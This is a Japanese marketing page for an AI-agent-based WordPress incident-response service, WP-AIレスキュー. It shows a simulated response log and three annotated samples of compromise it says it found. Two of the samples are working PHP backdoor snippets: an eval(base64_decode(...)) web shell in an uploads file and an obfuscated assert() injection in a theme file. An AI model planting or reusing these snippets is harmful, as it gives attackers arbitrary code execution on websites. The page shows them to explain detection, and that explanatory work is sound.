乗っ取られたWordPress を、取り戻す。

「サイトが改ざんされた」「Google から『このサイトは危険です』と警告が出た」「管理画面に入れない」「が仕込まれた」—— そんな WordPress の緊急事態に、が並列で駆けつけ、調査から再発防止まで一気通貫で対応します。

いきなりのご契約ではなく、まずはサイト URL を1行いただくだけの無料診断から。状況を整理した上で、必要な対応をご提案します。

URL1行で無料診断を始める緊急で復旧を依頼する

URL を1行入力するだけ · 速やかに折り返し · 後払い対応 · パニック中でも大丈夫です

watrix-incident-cli — agents.live — 88×24

$ watrix incident-response --case=case-2026-05-001

02:14:37INFOFILES_SCAN started: /var/www/html

02:14:41INFOAGENT[forensics] online · 18,442 files queued

02:14:51ALERTDETECTED wp-content/uploads/2026/05/lk9d8f.php

02:14:52ALERTMATCH YARA: PHP_Backdoor_FilesMan_v2

02:15:02WARNDB_QUERY unauthorized administrator: backdoor@evil

02:15:08INFOAGENT[ir] sealing session tokens · all admins logged out

02:15:14INFOAGENT[hardening] applying CVE-2024-32709 patch

02:15:23INFOREPORT forensics_v1.pdf · 28 pages compiled

※ 上記は実対応案件の処理ログ再現（個別情報は匿名化）

個別差大・参考値

2:20:00

侵害発覚から復旧まで（事例）

WATRIX 独自体制

24体

WordPress 専門 AI エージェント並列

全プラン標準

72h

個人情報保護法報告対応

全プラン標準

30日

復旧後の再侵入監視

※ 「2:20:00」は特定事例の参考値です。所要時間はサイト規模・侵害深度・サーバ環境により大きく変動します。すべての WordPress サイトで同じ時間を保証するものではありません。

Photo: Mohammad Rahmani / Unsplash

Field Notes — WordPress 侵害現場ログ

「WordPress のマルウェア、
駆除しました」を、鵜呑みにしないでください。

他社で復旧が終わったあと、WP-AIレスキューにセカンドオピニオンを依頼すると、こういう の見落とし が見つかることがあります。 WordPress の侵害現場で AI エージェントが実際に検出した、3つの典型サンプルです。

深夜のターミナル画面に流れるコードのイメージ — Photo: Rob Wingate / Unsplash

Sample 01 / 01 of 03

uploads配下に仕込まれた

📄 wp-content/uploads/2026/05/lk9d8f.php

本サンプルは演習環境で実検出されたもの。アクセスログを精査しないと、設置と実行が一致せず見落とされる。

lk9d8f.php

<?php
/* lk9d8f.php — 一見、単なる空ファイル。
   実態は、攻撃者が任意のPHPコードを実行できるバックドア。 */

if (isset($_REQUEST["c"])) {
  @eval(base64_decode($_REQUEST["c"]));
}
//↑ この3行で、サイト全体が攻撃者のものになる。

Sample 02 / 02 of 03

テーマfunctions.phpへの「自動再生成」型注入

📄 wp-content/themes/twentytwentyfour/functions.php

「ファイル名は変えられない、中身だけ汚染」型。テーマ更新で消すと管理画面ごと壊れるため、行範囲特定が必須。

functions.php

// — 末尾に静かに追記される、難読化された再注入トリガー —
$_HK = "Z3ppbmZsYXRl";  // = "gzinflate"
@${$_HK = base64_decode($_HK)};  // 動的関数解決
if (isset($_GET["x"]) && $_GET["x"] === "ping") {
  @assert($_POST["p"] ?? "true");  // 任意コード実行
}

Sample 03 / 03 of 03

wp_options への「リダイレクトハイジャック」

📄 wp_options.siteurl / wp_options._evil_url

ファイル系のスキャンだけでは絶対に見つからない。DBクエリでの直接照合が必要。

wp_options._evil_url

-- DB上の設定値が、ある日こうなっている。
SELECT option_name, option_value
FROM wp_options
WHERE option_name IN ('siteurl', 'home');

-- option_value がこっそり外部ドメインに書き換わると、
-- ログイン画面まで攻撃者制御サーバへリダイレクトされる。

WordPress への侵害は、「気付かれにくい場所」に潜みます。

人手で1ファイルずつ目視している限り、見落としは生まれやすくなります。 24体の AI エージェントが 同時並列で 全ファイル・全 DB レコード・全アクセスログを照合し、「この1行だけ怪しい」を徹底的に拾い上げる——これが WP-AIレスキューのアプローチです。

Service Overview